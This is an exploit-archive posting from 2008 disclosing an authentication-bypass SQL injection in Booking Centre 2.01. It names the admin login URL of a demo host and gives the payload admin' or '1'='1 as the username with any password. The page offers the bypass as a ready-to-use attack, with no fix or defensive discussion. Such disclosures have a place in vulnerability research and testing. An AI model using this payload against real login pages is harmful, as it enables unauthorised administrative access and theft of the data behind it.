[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability
# Published : 2008-11-28
# Author : MrDoug
# Previous Title : Basic PHP CMS (index.php id) Blind SQL Injection Vulnerability
# Next Title : Web Calendar System <= 3.40 (XSS/SQL) Multiple Remote Vulnerabilities
Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability
--------------------------------------------------------------
Author: MrDoug
E-mail: mrdoug13[at]gmail[dot]com
--------------------------------------------------------------
Exploit: http://demo.hotelsadmin.com/admin/index.php
Username == admin' or '1'='1
password == (whatever)
--------------------------------------------------------------
Greetz to Slappywag
--------------------------------------------------------------
# www.Syue.com [2008-11-28]